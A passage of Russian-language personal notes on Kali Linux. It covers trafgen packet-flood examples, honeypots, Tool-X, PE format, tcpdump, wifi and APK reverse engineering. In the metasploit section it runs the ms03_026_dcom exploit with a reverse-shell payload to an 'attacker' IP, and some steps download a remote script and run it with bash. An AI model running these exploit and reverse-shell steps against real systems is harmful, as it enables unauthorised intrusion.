0%D0%B0%D0%B7%D0%BE%D0%BC%2C%20%D0%B0%20%D0%BD%D0%B5%20%D1%86%D0%B8%D0%BA%D0%BB%D0%B8%D1%87%D0%B5%D1%81%D0%BA%D0%B8%D0%BC%20%D1%81%D0%BF%D0%BE%D1%81%D0%BE%D0%B1%D0%BE%D0%BC.%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%D0%92%D1%8B%D1%85%D0%BE%D0%B4%D0%BD%D1%8B%D0%BC%20%D1%83%D1%81%D1%82%D1%80%D0%BE%D0%B9%D1%81%D1%82%D0%B2%D0%BE%D0%BC%20%D0%B4%D0%BB%D1%8F%20%D0%BF%D0%B0%D0%BA%D0%B5%D1%82%D0%BE%D0%B2%20%D1%8F%D0%B2%D0%BB%D1%8F%D0%B5%D1%82%D1%81%D1%8F%20»em1».%0D%0A%0D%0Atrafgen%20—dev%20eth0%20—conf%20icmp.cfg%20—rand%20—num%201400000%20-k1000%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%D0%9E%D1%82%D0%BF%D1%80%D0%B0%D0%B2%D1%8C%D1%82%D0%B5%20%D1%82%D0%BE%D0%BB%D1%8C%D0%BA%D0%BE%201400000%20%D0%BF%D0%B0%D0%BA%D0%B5%D1%82%D0%BE%D0%B2%2C%20%D0%B8%D1%81%D0%BF%D0%BE%D0%BB%D1%8C%D0%B7%D1%83%D1%8F%20»icmp.cfg»%20%D1%84%D0%B0%D0%B9%D0%BB%20%D0%BA%D0%BE%D0%BD%D1%84%D0%B8%D0%B3%D1%83%D1%80%D0%B0%D1%86%D0%B8%D0%B8%2C%20%D0%B0%20%D0%B7%D0%B0%D1%82%D0%B5%D0%BC%20%D0%B2%D1%8B%D0%B9%D0%B4%D0%B8%D1%82%D0%B5%20%D0%B8%D0%B7%20trafgen.%20%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%D0%92%D1%8B%D0%B1%D1%80%D0%B0%D1%82%D1%8C%20%D0%BF%D0%B0%D0%BA%D0%B5%D1%82%D1%8B%20%D1%81%D0%BB%D1%83%D1%87%D0%B0%D0%B9%D0%BD%D1%8B%D0%BC%20%D0%BE%D0%B1%D1%80%D0%B0%D0%B7%D0%BE%D0%BC%20%D0%B8%D0%B7%20%D1%8D%D1%82%D0%BE%D0%B3%D0%BE%20%D1%84%D0%B0%D0%B9%D0%BB%D0%B0%20%D0%B4%D0%BB%D1%8F%20%D0%BF%D0%B5%D1%80%D0%B5%D0%B4%D0%B0%D1%87%D0%B8%20%D0%B8%20%D0%BE%D1%82%D0%BF%D1%80%D0%B0%D0%B2%D0%B8%D1%82%D1%8C%20%D0%B8%D1%85%20%D1%87%D0%B5%D1%80%D0%B5%D0%B7%20eth0.%20%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%D0%9A%D1%80%D0%BE%D0%BC%D0%B5%20%D1%82%D0%BE%D0%B3%D0%BE%2C%20%D0%B7%D0%B0%D0%BF%D1%83%D1%81%D0%BA%D0%B0%D0%B9%D1%82%D0%B5%20%D1%8F%D0%B4%D1%80%D0%BE%20%E2%80%8B%E2%80%8B%E2%80%8B%E2%80%8B%D0%BA%D0%B0%D0%B6%D0%B4%D1%8B%D0%B5%201000%20%D0%BC%D0%BA%D1%81%20%D0%B4%D0%BB%D1%8F%20%D0%B3%D1%80%D1%83%D0%BF%D0%BF%D0%B8%D1%80%D0%BE%D0%B2%D0%B0%D0%BD%D0%B8%D0%B5%20%D0%BA%D0%BE%D0%BB%D1%8C%D1%86%D0%B5%D0%B2%D1%8B%D1%85%20%D0%BA%D0%B0%D0%B4%D1%80%D0%BE%D0%B2%20%D0%B8%D0%B7%20%D0%BF%D0%BE%D0%BB%D1%8C%D0%B7%D0%BE%D0%B2%D0%B0%D1%82%D0%B5%D0%BB%D1%8C%D1%81%D0%BA%D0%BE%D0%B3%D0%BE%20%D0%BF%D1%80%D0%BE%D1%81%D1%82%D1%80%D0%B0%D0%BD%D1%81%D1%82%D0%B2%D0%B0%20(%D0%BF%D0%BE%20%D1%83%D0%BC%D0%BE%D0%BB%D1%87%D0%B0%D0%BD%D0%B8%D1%8E%2010us).%0D%0A%0D%0Atrafgen%20—dev%20eth0%20—conf%20tcp_syn.cfg%20-u%20%60id%20-u%20bob%60%20-g%20%60id%20-g%20bob%60%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%D0%9E%D1%82%D0%BF%D1%80%D0%B0%D0%B2%D0%BA%D0%B0%20%D0%BF%D0%B0%D0%BA%D0%B5%D1%82%D0%BE%D0%B2%2C%20%D1%81%D0%B3%D0%B5%D0%BD%D0%B5%D1%80%D0%B8%D1%80%D0%BE%D0%B2%D0%B0%D0%BD%D0%BD%D1%8B%D1%85%20%D0%B8%D0%B7%20%D1%84%D0%B0%D0%B9%D0%BB%D0%B0%20%D0%BA%D0%BE%D0%BD%D1%84%D0%B8%D0%B3%D1%83%D1%80%D0%B0%D1%86%D0%B8%D0%B8%20tcp_syn.cfg%20%D1%87%D0%B5%D1%80%D0%B5%D0%B7%20%D1%81%D0%B5%D1%82%D0%B5%D0%B2%D0%BE%D0%B5%20%D1%83%D1%81%D1%82%D1%80%D0%BE%D0%B9%D1%81%D1%82%D0%B2%D0%BE%20eth0.%20%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%D0%9F%D0%BE%D1%81%D0%BB%D0%B5%20%D0%BD%D0%B0%D1%81%D1%82%D1%80%D0%BE%D0%B8%D1%82%D1%8C%20%D0%BA%D0%BE%D0%BB%D1%8C%D1%86%D0%BE%20%D0%B4%D0%BB%D1%8F%20%D0%BF%D0%B5%D1%80%D0%B5%D0%B4%D0%B0%D1%87%D0%B8%2C%20%D1%81%D0%B1%D1%80%D0%BE%D1%81%D0%B8%D1%82%D1%8C%20%D1%83%D1%87%D0%B5%D1%82%D0%BD%D1%8B%D0%B5%20%D0%B4%D0%B0%D0%BD%D0%BD%D1%8B%D0%B5%20%D0%BD%D0%B0%20%D0%BF%D0%BE%D0%BB%D1%8C%D0%B7%D0%BE%D0%B2%D0%B0%D1%82%D0%B5%D0%BB%D1%8C%20%D0%B1%D0%B5%D0%B7%20%D0%BF%D0%BE%D0%BB%D0%BD%D0%BE%D0%BC%D0%BE%D1%87%D0%B8%D0%B9%20root%2F%D0%B3%D1%80%D1%83%D0%BF%D0%BF%D0%B0%20bob%2Fbob.%0D%0A%0D%0Atrafgen%20—dev%20eth0%20’%7B%20fill(0xff%2C%206)%2C%200×00%2C%200×02%2C%200xb3%2C%20rnd(3)%2C%20c16(0x0800)%2C%20fill(0xca%2C%2064)%20%7D’%20-n%201%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%D0%9E%D1%82%D0%BF%D1%80%D0%B0%D0%B2%D1%8C%D1%82%D0%B5%201%20%D0%BD%D0%B5%D0%B4%D0%B5%D0%B9%D1%81%D1%82%D0%B2%D0%B8%D1%82%D0%B5%D0%BB%D1%8C%D0%BD%D1%8B%D0%B9%20%D0%BF%D0%B0%D0%BA%D0%B5%D1%82%20IPv4%2C%20%D1%81%D0%BE%D0%B7%D0%B4%D0%B0%D0%BD%D0%BD%D1%8B%D0%B9%20%D0%B8%D0%B7%20%D0%BA%D0%BE%D0%BC%D0%B0%D0%BD%D0%B4%D0%BD%D0%BE%D0%B9%20%D1%81%D1%82%D1%80%D0%BE%D0%BA%D0%B8%2C%20%D0%BD%D0%B0%20%D0%B2%D1%81%D0%B5%20%D1%85%D0%BE%D1%81%D1%82%D1%8B.%0D%0A%0D%0A» provider=»manual» lang=»default»/]

Рубрики
kali \ virus \ rootkit \ вирусы \ защита

honeypot

Ссылки:

https://opencanary.readthedocs.io/en/latest/starting/configuration.html
https://jasonmurray.org/posts/2021/opencanary/
https://github.com/thinkst/opencanary
https://github.com/pwnlandia/mhn
https://github.com/technicaldada/pentbox
https://en.iguru.gr/dimiourgia-honeypot-sto-kali-linux-pentbox/
https://itsecforu.ru/2018/03/19/%D0%BD%D0%B0%D1%81%D1%82%D1%80%D0%BE%D0%B9%D0%BA%D0%B0-honeypot-%D0%B2-kali-linux-pentbox/
https://github.com/thinkst/opencanary/wiki
https://habr.com/ru/company/alexhost/blog/528796/

https://kali.tools/all/?

Вроде как актуально:


opencanary

https://opencanary.readthedocs.io/en/latest/starting/configuration.html
https://jasonmurray.org/posts/2021/opencanary/
Рубрики
kali \ virus \ rootkit \ вирусы \ защита

Kali Undercover Mode ( оформление windows 10 для linux )

Ссылки :

В последнем обновлении популярный среди безопасников и хакеров дистрибутив Kali Linux получил любопытный режим «Undercover» — «под прикрытием», 
суть которого сводится к визуальной мимикрии под графическую оболочку Windows.

http://compizomania.blogspot.com/2019/12/kali-undercover-mode-xfce-linux.html
https://habr.com/ru/company/dcmiran/blog/478314/

Установка:

0. Xfce +  Whiske
sudo apt-get update - прежде всего обновим список пакетов
sudo apt-get install xfce4 -y - затем установим основные компоненты рабочего стола xfce
sudo apt-get install xfce4-goodies -y - теперь добавим дополнительные компоненты командой
sudo apt-get install task-xfce-desktop - решение проблемы с ярлыками
sudo apt-get install xfce4-whiskermenu-plugin

 
 
1. Качаем и ставим undercover
wget  http://archive.kali.org/kali/pool/main/k/kali-undercover/kali-undercover_2019.4.1_all.deb
sudo dpkg -i kali-undercover_2019.4.1_all.deb


git clone https://gitlab.com/kalilinux/packages/kali-undercover
cd ~/kali-undercover
sudo cp -r share /usr/
sudo cp bin/kali-undercover /usr/bin/

2. По умолчанию в скрипте на установку задействована только светлая тема оформления приложений, 
но желающие могут добавить тёмную тему того же автора, выполнив следующие команды в терминале:

cd /tmp; wget https://github.com/B00merang-Project/Windows-10-Dark/archive/master.zip
unzip master.zip
sudo mv Windows-10-Dark-master /usr/share/themes

3. Если вы передумаете и решите полностью удалить Kali Undercover Mode, 
перейдите на оформление XFCE и выполните в терминале следующие команды на удаление:

sudo rm /usr/bin/kali-undercover
sudo rm /usr/share/applications/kali-undercover.desktop
sudo rm -r /usr/share/icons/Windows-10-Icons
sudo rm -r /usr/share/themes/Windows-10
sudo rm -r /usr/share/kali-undercover

Рубрики
kali \ virus \ rootkit \ вирусы \ защита

Tool-X

ссылки

https://github.com/rajkumardusad/Tool-X
https://amitego.ru/community-2/main-category/tool-x-eto-odnim-slovom-ustanovshhik-hakerskih-programm/

установка

sudo apt update - обновляем установленные пакеты 
sudo apt install git - устанавливаем git
git clone https://github.com/rajkumardusad/Tool-X.git - ставим из git Tool-X
cd Tool-X - переходим в каталог с Tool-X 
chmod +x install.aex - даем права на выполнение
sh install.aex если не работает выполняем так ./install.aex

Как использовать?

(0) : установить все программы
(1): показать все доступные инструменты и ввести номер инструмента, который вы хотите установить.
(2): Показать категорию инструментов.
(3): для установки операционной системы в Termux
(4): если вы хотите обновить Tool-X.
(5): Если вы хотите знать о нас.
(х): для выхода из инструмента.


Программы устанавливаются сюда:
cd /root - для linux
cd /data/data/com.termux/files/home - для android termux
Рубрики
kali \ virus \ rootkit \ вирусы \ защита

pe_format7

DOS заголовок
четыре байта 4D 5a   значение Mz
текст ..program cannot be run Dos mode.
так же  адрес начало pe заголовка. 50 45 значение Pe

PE заголовок
5045 значение Pe
Здесь мы можем увидеть список секций. обычно не больше 10.
У каждой секции есть атрибуты чтения, записи и исполнения.
Имена секций не фиксированы называться могут как угодно.

.text - секция кода где содержится код программы. 

Чаще всего стоит запрет на запись. Разрешено выполнение и чтение.
.data - секция данных. данные для работы программы.

Чаще всего стоит запрет на выполнение. Запись и чтение разрешено.
.rdata - таблица импорта. перечислены нужные библиотеки для работы программы.

.rsrc - ресурсы программы. Картинки, иконки, звуки и мелодии.



petools программа для ковыряния исполнительных файлов.
entry point адресс входа в программу


Рубрики
kali \ virus \ rootkit \ вирусы \ защита

из одного видео по безопасности :)

Пользователь:

Пользователь никогда не должен иметь доступ к источнику информации.

Вирусы:

Блокировщики
Диструкторы
Шифраторы
Шпионы
Ботнет-DDOS

Запуск:

1. autorun.inf
2. авто установщики / авто архивы
3. скрипты\зараженные страницы.
4. java \ flash \ ПО \ ОС \ дыры

Защита:

1. Сканирование
2. Запуск в песочнице
3. Отслеживание действий
4. Проверка записи
5. Полная проверка (drweb cureit) AVZ

Запись неверной инфы в программу / данные:

вероятные события
1. остановка
2. не верный результат

90% - чтение данных
10% - записи данных

Два сервера первый запись и чтение. 
а второй резервный только запись
в сучили аварии основного сервера начинаем использовать резервный.

пароли — подбор:

1. 62 варианта
2. 62 в квадрате 3844
3. Не Болтай..... шоколадки рулят...
4. простые пароли
5. вскрываемые социальные пароли
6. одиночные слова и короткие фразы
7. пустой пароль
Рубрики
kali \ virus \ rootkit \ вирусы \ защита

dotNET

.NET = dotNET

.NET Framework

Виртуальная .NET машина - Common Language Runtime (CLR)

C Sharp = C# сишарп
J Sharp = J# джишарп
Visual Basic .NET визуал бейсик дотнет

Common Intermediate Launguage CIL - IL - промежуточный язык
http://en.wikipedia.org/wiki/List_of_CIL_instructions - инструкции

Инструменты
net.reflector + addons reflexil.netreflector
ilspy

Крэкми
Можем редактировать только il  язык
Рубрики
Android kali \ virus \ rootkit \ вирусы \ защита

termux / metasploit / kali / nethunter

Ссылки:

https://wiki.termux.com/wiki/%D0%AD%D0%BA%D1%80%D0%B0%D0%BD%D0%BD%D0%B0%D1%8F_%D0%BA%D0%BB%D0%B0%D0%B2%D0%B8%D0%B0%D1%82%D1%83%D1%80%D0%B0
https://wiki.termux.com/wiki/Kali_Nethunter
https://f-droid.org/packages/com.termux/
https://wiki.termux.com/wiki/Main_Page

Старая доп панель:
vi ~/.termux/termux.properties

extra-keys = [['ESC','/','-','HOME','UP','END','PGUP'],['TAB','CTRL','ALT','LEFT','DOWN','RIGHT','PGDN']]

Kali Nethunter

Установка nethunter:
pkg install wget
wget https://raw.githubusercontent.com/Hax4us/Nethunter-In-Termux/master/kalinethunter
chmod +x kalinethunter
bash kalinethunter

Решение проблем после установки:
apt-key adv --keyserver hkp://keys.gnupg.net --recv-keys 7D8D0BF6
wget https://http.kali.org/kali/pool/main/k/kali-archive-keyring/kali-archive-keyring_2018.1_all.deb
apt --fix-broken install
dpkg -i ./kali-archive-keyring_2018.1_all.deb

metasploit

pkg update
pkg install unstable-repo
pkg install metasploit
msfconsole
db_status
git init

----------
----------

use auxiliary/scanner/portscan/tcp
set PORTS 1-5000
set RHOSTS 192.168.88.161
run
search dcom
use exploit/windows/dcerpc/ms03_026_dcom
set payload windows/shell_reverse_tcp
show options
set RHOSTS 192.168.88.161 (IP той машины, которую будем проверять на защищенность)
set LHOST 192.168.88.247  - IP злоумышленника
run
cd ..\..\
echo Hello! >  achtung.x
msg helo
можно вводить любую команду, как в обычном cmd.exe

Любимые приложения:

pkg install openssh python golang vim 

Рубрики
kali \ virus \ rootkit \ вирусы \ защита

как изменить фон GRUB в Kali Linux

/usr/share/images/desktop-base/desktop-grub.png - символьная ссылка
/usr/share/images/desktop-base/kali-grub.png - само изображение тут
mv /usr/share/images/desktop-base/kali-grub.png /usr/share/images/desktop-base/kali-grub.png.bak - переносим \ делаем bakup файла
cp wallpaper-1.png /usr/share/images/desktop-base/kali-grub.png  - копируем нашу новую заставку для grub
update-grub - просим grub перечитать конфиг файлы
Рубрики
kali \ virus \ rootkit \ вирусы \ защита

решение ошибки «Следующие подписи неверные» в Kali Linux

wget 'https://archive.kali.org/archive-key.asc'
apt-key add archive-key.asc

Рубрики
kali \ virus \ rootkit \ вирусы \ защита

x \ xwindows \ gnome \ Cinnamon \ KDE \ LXDE \ MATE

Cinnamon

sudo apt-get install kali-defaults kali-root-login desktop-base cinnamon - установка 

sudo update-alternatives --config x-session-manager - выбор окружения

sudo apt install lightdm - установка lightdm ( поможет если cinnamon не запустился )

Установка Xfce в Kali Linux:

sudo apt-get install kali-defaults kali-root-login desktop-base xfce4 xfce4-places-plugin xfce4-goodies - установка
sudo apt-get remove xfce4 xfce4-places-plugin xfce4-goodies - для удаления

Установка KDE в Kali Linux:

sudo apt-get install kali-defaults kali-root-login desktop-base kde-plasma-desktop - установка 
sudo apt-get install kali-defaults kali-root-login desktop-base kde-standard - установка стандартная
sudo apt-get install kali-defaults kali-root-login desktop-base kde-full - установка полный набор пакетов

sudo apt-get remove kde-plasma-desktop kde-plasma-netbook kde-standard - удаление

Установка LXDE в Kali Linux:

sudo apt-get install lxde-core lxde kali-defaults kali-root-login desktop-base - установка 

sudo apt-get remove lxde-core lxde - удаление

Установка GNOME в Kali Linux:

sudo apt-get install gnome-core kali-defaults kali-root-login desktop-base - установка

sudo apt-get remove gnome-core - удаление

Установка MATE в Kali Linux:

sudo apt-get install kali-defaults kali-root-login desktop-base mate-core - установка

sudo apt-get install kali-defaults kali-root-login desktop-base mate-desktop-environment - установка mate-core и дополнения

sudo apt-get install kali-defaults kali-root-login desktop-base mate-desktop-environment-extra - установка и еще больше обновлений

sudo apt-get remove mate-core  - удаление 

Установка e17 в Kali Linux:

sudo apt-get install e17 - установка

sudo apt-get remove e17 - удаление


Изменить окружение из установленных:

Используйте следующую команду чтобы выбрать главное окружение рабочего стола. 
Эта команда выведет список доступных вариантов.

sudo update-alternatives --config x-session-manager

Включить/отключить графический режим с помощью systemctl

Узнать какой режим сейчас установлен можно командой:
systemctl get-default

graphical.target - запускается графическая оболочка при старте
multi-user.target - графика не стартует

Отключить запуск X-ов при старте системы:
systemctl set-default multi-user.target

Вернуть обратно запуск графической оболочки:
systemctl set-default graphical.target


Рубрики
kali \ virus \ rootkit \ вирусы \ защита

очистка системы \ временные файлы \ кеш обновлений \

!!! Будь осторожен можно сломать дистрибутив
sudo apt-get autoremove -y - удаление не нужных файлов после установки ПО
sudo apt-get autoclean -y - удалить скачанные файлы архивов
sudo apt-get clean -y - удалить старые скачанные файлы архивов
sudo apt-get install -f -y - решение проблем с установкой по
Рубрики
kali \ virus \ rootkit \ вирусы \ защита

wi-fi настройка

iwconfig wlan0
iwconfig wlan0 essid name key password 
iwconfig wlan0 essid name key s:password


ip link set wlp2s0 up - включить устройство wlp2s0 
!!! Если у вас возникнет ошибка:
!!! RTNETLINK answers: Operation not possible due to RF-kill
!!! Можно установить утилиту rfkill и с ее помощью решить эту проблему.


lspci | grep -i wireless - поиск беспроводных pci-карт
ip link list - выводе этой команды будет содержать все сетевые интерфейсы
iw dev - показать устройства wi-fi


iwconfig wlan0 essid "MyNet" - присвоить SSID "MyNet"
iwconfig wlan0 channel 3 - установит канал 3
iwconfig wlan0 mode Ad-Hoc - сменить режим Managed на Ad-Hoc
iwconfig wlan0 ap any - использовать любую точку доступа
iwconfig wlan0 sens -50 - установить чувствительность -50
iwconfig wlan0 retry 20 - установить значение 20 для повторной передачи MAC
ifconfig wlan0 key 1234-pass-123 - установить пароль 1234-pass-123
iwconfig wlp4s0 mode ad-hoc - настройка режима работы ad-hoc
iwconfig wlp4s0 essid ваш_essid - подключение к незащищенной сети
iwconfig wlp4s0 essid ваш_essid freq 2432M - подключение с задающим каналом сети
iwconfig wlp4s0 essid ваш_essid key s:ваш_ключ -подключение к WEP зашифрованному каналу сети, ключа ASCII
iwconfig wlp4s0 power on - включение режима экономии питания


iw dev wlp4s0 link iwconfig wlp4s0 - показать статус соединения
iw dev wlp4s0 scan iwlist wlp4s0 scan -сканирование сети на точки доступа
iw dev wlp4s0 set type ibss  - настройка режима работы ad-hoc
iw dev wlp4s0 connect ваш_essid - подключение к незащищенной сети
iw dev wlp4s0 connect ваш_essid 2432 - подключение с задающим каналом сети
iw dev wlp4s0 connect ваш_essid key 0:ваш_ключ -  -подключение к WEP зашифрованному каналу сети, ключа ASCII
iw dev wlp4s0 set power_save on - включение режима экономии питания
iw dev wlp4s0 scan | less - сканируем сеть


Рубрики
kali \ virus \ rootkit \ вирусы \ защита

проверка и исправление репозиториев \ apt \ sources.list

Проверка файла sources.list:

if cat /etc/apt/sources.list | grep -E "deb https://http.kali.org/kali kali-rolling main contrib non-free" || cat /etc/apt/sources.list | grep -E "deb https://http.kali.org/kali kali-rolling main non-free contrib"; then echo -e "\n\nРепозитории в порядке"; else echo -e "\n\nПроблемы с репозиториями"; fi

Одно из решений, перепишем sources.list:

0. Делаем резервную копию
cp /etc/apt/sources.list /etc/apt/sources.list.`date +%Y-%m-%d`.back

1. Переписываем source.list 
echo -e "deb https://http.kali.org/kali kali-rolling main non-free contrib" > /etc/apt/sources.list

2. Обновим систему
а) так
sudo apt update 
sudo apt upgrade -y 
sudo apt full-upgrade -y

б) или так
sudo apt update && sudo apt full-upgrade -y

Рубрики
kali \ virus \ rootkit \ вирусы \ защита

tcpdump / снифер / sniffer

Установка

yum install tcpdump - установка в centos
apt install tcpdump - установка в debian

Опции утилиты tcpdump:

-i интерфейс # Задает интерфейс, с которого необходимо анализировать трафик (без указания интерфейса - анализ "первого попавшегося")
-n           # Отключает преобразование IP в доменные имена. Если указано -nn, то запрещается преобразование номеров портов в название протокола.
-e           # Включает вывод данных канального уровня (например, MAC-адреса).
-v           # Вывод дополнительной информации (TTL, опции IP).
-s размер    # Указание размера захватываемых пакетов. (по умолчанию - пакеты больше 68 байт)
-w имя_файла # Задать имя файла, в который сохранять собранную информацию.
-r имя_файла # Чтение дампа из заданного файла.
-p           # Захватывать только трафик, предназначенный данному узлу. (по умолчанию - захват всех пакетов, например в том числе широковещательных).
-q           # Переводит tcpdump в "бесшумный режим", пакет анализируется на транспортном уровне (протоколы TCP, UDP, ICMP), а не на сетевом (протокол IP).
-t           # Отключает вывод меток времени.

Наиболее часто используемые фильтрующие параметры команды tcpdump:

 
dst хост     # Проверяет, совпадает ли адрес получателя IP-пакета с указанным значением. 
             # Возможно задавать как IP, подсеть в формате 10.0.0.1/24, так и имя хоста.

src хост     # Проверяет, совпадает ли адрес отправителя IP пакета с указанным значением. 
             # Возможно задавать как IP, подсеть в формате 10.0.0.1/24, так и имя хоста.

host хост    # Проверяет, совпадает ли адрес отправителя или получателя с заданным значением. 
             # Возможно задавать как IP, подсеть в формате 10.0.0.1/24, так и имя хоста.

net имя_сети # Проверяется, находится ли адрес отправителя/получателя в заданной сети. 
             # Возможно указание сети в формате CIDR (например 10.0.0.1/22), либо указание имени сети, 
             # заданной в файле /etc/networks.


ip | arp | rarp | tcp | udp | icmp [хост]    # Проверяет, принадлежит ли пакет одному из указанных протоколов и при указании адреса хоста проверяет, 
                                             # совпадает ли адрес отправителя\получателя с заданным. 
                                             # Возможно задавать как IP, подсеть в формате 10.0.0.1/24, так и имя хоста.

[tcp | udp] dst port номер_порта             # Проверяется, принадлежит ли пакет протоколу TCP/UDP и равен ли порт назначения заданному. 
                                             # Можно указать номер порта, либо имя, заданное в файле /etc/services.

[tcp | udp] src port номер_порта             # Проверяется, принадлежит ли пакет протоколу TCP/UDP и равен ли порт источника заданному.
                                             # Можно указать номер порта, либо имя, заданное в файле /etc/services.     

[tcp | udp] port номер_порта                 # Проверяется, принадлежит ли пакет протоколу TCP/UDP и равен ли порт назначения или источника заданному. 
                                             # Можно указать номер порта, либо имя, заданное в файле /etc/services.

ether { src | dst | host } MAC_адрес         # Проверяется, принадлежит ли сетевой пакет источнику, назначению, 
                                             # источнику или назначению имеющему заданный MAC_адрес.


ip broadcast                                 # Проверяется, является ли IP пакет широковещательным.

ether broadcast                              # Проверяется, является ли ARP-пакет широковещательным.

Примеры использования tcpdump:


tcpdump -i eth0                                 # слушаем интерфейс eth0

tcpdump port 80                                 # слушаем 80 порт             
                   
tcpdump host google.com                         # слушаем трафик с хоста google.com

tcpdump -n -i eth0 icmp                         # Ловим пакеты icmp (ping pong)

tcpdump | grep -v ssh                           # поиск пакетов исключая пакеты ssh

tcpdump -n -i eth0 net 192.168.1.15             # трафик с/на IP

tcpdump -n -i eth0 net 192.168.1.0/24           # трафик с/в сеть

tcpdump -l > dump && tail -f dump               # Вывод с записью в файл

tcpdump -i eth0 -w traffic.eth0                 # Информация о трафике записывается в бинарный файл traffic.eth0

tcpdump -i eth0 -s 0 -w traffic.eth0            # Запись + загрузка в бинарный файл

tcpdump -r traffic.eth0                         # Читаем из файла

tcpdump -i eth0 -X port \(110 or 143\)          # Проверка pop и imap на безопасность

tcpdump -i eth0 -s 0 -A port 80 | grep GET      # (-s 0 весь пакет, -A для ASCII)

tcpdump -npi iface_name ether src MAC-address   # узнать MAC устройства iface_name -имя интерфейса MAC-address -мак адрес устройства

tcpdump -vvv -s 0 -l -n port 53                 # показываем DNS трафик

tcpdump -nl -i bge0 not port ssh and src \(192.168.16.121 or 192.168.16.54\)

tcpdump -n -i eth1 net 192.168.16.121           # Выборка входящий/исходящий по одному IP адресу
tcpdump -n -i eth1 net 192.168.16.0/24          # Выборка входящий/исходящий по адресу сети
tcpdump -l > dump && tail -f dump               # Вывод через буфер

tcpdump -i rl0 -w traffic.rl0                   # Писать заголовки в бинарный файл
tcpdump -i rl0 -s 0 -w traffic.rl0              # Писать в бинарный фйл полные пакеты
tcpdump -r traffic.rl0                          # Прочитать из файла (так-же для ethereal

tcpdump -i eth0 -s 0 -A port 80 | grep GET      # -s 0 для полных пакетов, -A для ASCII

 

Пример частого применения

tcpdump -n -i eth0  -s0 not port 22 and not port 8080 and not port 161 and not arp
-n 
Не преобразовывать dns имена

-i eth0 
Указывает интерфейс, на котором будет захват трафика (замените eth0 на нужный интерфейс).

-s 0
Устанавливает размер снэпшота. 
По умолчанию tcpdump захватывает только первые 96 байт каждого пакета, параметр -s 0 указывает захватывать полный пакет.


not port 22
не собирать инфу по 22 порту

and 
служит для добавления еще фильтра

not port 8080
не собирать инфу по 8080 порту

and 
служит для добавления еще фильтра

not port 161
не собирать инфу по 161 порту

and 
служит для добавления еще фильтра

not arp
не собирать инфу по arp

Еще из одних частых способов применения

Возможные параметры:
-n: Не преобразовывать IP-адреса и порты в имена.
-vvv: Включает максимально подробный вывод.
-X: Показывает содержимое пакетов в шестнадцатеричном и ASCII форматах.
-i fm1-mac3: Указывает сетевой интерфейс fm1-mac3 для захвата пакетов.
port 4000: Фильтрует пакеты по порту 4000.
src 192.168.55.60: Фильтрует пакеты по IP-адресу источника 192.168.55.60.
dst 192.168.55.60: Фильтрует пакеты по IP-адресу назначения 192.168.55.60.

Пример:
tcpdump -n -vvv -X  port 4000 and dst 192.168.55.60

Wireshark to file

tcpdump: Утилита для захвата сетевых пакетов.
-vvv: Увеличивает уровень детализации выводимой информации. -v дает более подробную информацию, -vv еще больше, и -vvv максимально подробный вывод.
-n: Не разрешать IP-адреса и порты в имена. Это делает вывод более быстрым и менее загроможденным.
-X: Показывает содержимое пакетов как в шестнадцатеричном, так и в ASCII форматах. Полезно для детального анализа содержимого пакетов.
-i fm1-mac3: Указывает интерфейс fm1-mac3 для захвата пакетов. Убедитесь, что это имя вашего сетевого интерфейса.
port 4000: Фильтрует пакеты по порту 4000. Только пакеты, относящиеся к этому порту, будут захвачены.
and dst 192.168.55.60: Дополнительный фильтр, который захватывает только те пакеты, у которых IP-адрес назначения 192.168.55.60.
-w -: Указывает tcpdump записывать вывод в стандартный поток вывода (stdout) вместо файла. Это позволяет передавать данные через канал (pipe) к другой команде.

ssh: Утилита для безопасного подключения к удаленным системам через сеть.
wrstemp@192.168.16.168: Указывает пользователя (wrstemp) и IP-адрес удаленного компьютера (192.168.16.168), к которому будет выполнено подключение.
'cat > /home/wrstemp/capture.pcap': Команда, которая будет выполнена на удаленном компьютере. 
Она принимает ввод (в данном случае поток данных от tcpdump) и записывает его в файл /home/wrstemp/capture.pcap.


tcpdump -i fm1-mac3 port 4000 and src 192.168.55.60 and dst 192.168.55.60 -w - | ssh wrstemp@192.168.16.168 'cat > /home/wrstemp/capture.pcap'
tcpdump -vvv -n -X -i fm1-mac3 port 4000 and dst 192.168.55.60 -w - | ssh -v wrstemp@192.168.16.168 'cat > /home/wrstemp/capture.pcap'


Рубрики
kali \ virus \ rootkit \ вирусы \ защита

android работа с apk

Необходимые пакеты:

ubuntu: 
apt install openjdk-7-jdk openjdk-8-jdk
apt install libc6:i386 libncurses5:i386 libstdc++6:i386 lib32z1 libbz2-1.0:i386

Android Studio:

https://developer.android.com/studio

!!! важно, установить в домашний каталог и все остальные утилиты ставить туда
~/android-tools/android-studio

Описание утилит:

ADB (Android Debug Bridge) - инструмент используемый для отладки устройств на базе Android с использованием соединения USB
Apktool - инструмент для распаковки и запаковки APK-файлов
Jadx - декомпилятор байт-кода Dalvik в код Java
Backsmali - дизассемблер кода Dalvik
Sign - инструменты для подписи пакетов


apt install adb mc zip 

cd ~/android-tools
#wget https://bitbucket.org/iBotPeaches/apktool/downloads/apktool_2.4.1.jar
wget https://bitbucket.org/iBotPeaches/apktool/downloads/apktool_2.11.0.jar
wget https://github.com/skylot/jadx/releases/download/v1.5.1/jadx-1.5.1.zip
wget https://github.com/appium-boneyard/sign/releases/download/1.0/sign-1.0.jar
wget https://bitbucket.org/JesusFreke/smali/downloads/baksmali-2.5.2.jar
mkdir jadx && cd jadx
unzip ../jadx-1.5.1.zip

Алиасы для запуска jar:

~/.bashrc

alias apktool='java -jar ~/android-tools/apktool_2.11.0.jar'
alias baksmali='java -jar ~/android-tools/baksmali-2.5.2.jar'
alias sign='java -jar ~/android-tools/sign-1.0.jar'
alias jadx='~/android-tools/jadx/bin/jadx-gui'
alias javac='javac -classpath ~/android-tools/android-sdk-linux/platforms/android-2.9/android.jar'
alias dx='~/android-tools/android-sdk-linux/build-tools/29.0.1/dx'

Установка Abdroid-studio linux:

Архив ищем тут:
https://developer.android.com/studio#downloads

Установка пакетов:
apt install libc6:i386 libncurses5:i386 libstdc++6:i386 lib32z1 libbz2-1.0:i386
cd ~/android-studio/bin
bash studio.sh

Вскрываем APK:

Где взять apk?
Можно из кеша вашего устройства, если приложение установлено.

0. способ:
Где пакет?
adb shell pm path  имя.пакета.приложения

